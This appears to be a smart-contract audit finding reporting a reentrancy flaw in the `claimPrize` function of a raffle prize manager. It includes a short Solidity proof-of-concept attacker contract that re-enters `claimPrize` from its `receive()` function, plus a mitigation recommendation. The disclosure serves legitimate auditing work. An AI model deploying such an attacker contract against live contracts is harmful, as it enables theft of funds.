Virtual Ebony Cricket

High

# Reenterncy in `WinnablesPrizeManager::claimPrize`

## Summary

The `claimPrize` function in the `WinnablesPrizeManager` contract is vulnerable to a reentrancy attack because it updates prize status after making external calls, and lacks reentrancy protection. This could allow an attacker to repeatedly call the function and disrupt prize claiming.

## Vulnerability Detail
The `claimPrize` function processes different types of prizes (NFTs, tokens, and ETH) based on the `raffleType`. It performs several operations and makes external calls to send prizes:

- NFT Prizes: Calls `_sendNFTPrize` after unlocking the NFT.
- Token Prizes: Calls `_sendTokenPrize` after adjusting token balances.
- ETH Prizes: Calls `_sendETHPrize` after adjusting ETH balances.

The check for winner and `rafflePrize.status` is getting update after sending the prize, This ordering allows an attacker to exploit the function by re-entering `claimPrize` before the initial transaction completes.

An attacker can deploy a malicious contract that re-enters the `claimPrize` function during prize transfers, potentially draining funds or claiming multiple prizes.

#### POC 
```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface IWinnablesTicket {
    function claimPrize(uint256 raffleId) external;
}

contract MaliciousContract {
    IWinnablesTicket public targetContract;
    uint256 public raffleId;

    // Constructor to initialize the target contract and raffle ID
    constructor(address _targetContract, uint256 _raffleId) {
        targetContract = IWinnablesTicket(_targetContract);
        raffleId = _raffleId;
    }

    // Function to start the attack
    function attack() external {
        targetContract.claimPrize(raffleId);
    }

    // Fallback function to re-enter the target contract
    receive() external payable {
        if (address(targetContract).balance > 0) {
            targetContract.claimPrize(raffleId);
        }
    }
}

```


## Impact
Attackers could exploit this vulnerability to claim multiple prizes or drain funds by repeatedly calling `claimPrize` before the initial call completes.

## Code Snippet
[WinnablesPrizeManager::claimPrize](https://github.com/sherlock-audit/2024-08-winnables-raffles/blob/main/public-contracts/contracts/WinnablesPrizeManager.sol#L105)

## Tool used

Manual Review

## Recommendation

 Consider implementing a reentrancy guard or follow CEI (Checks Effects Interactions) pattern
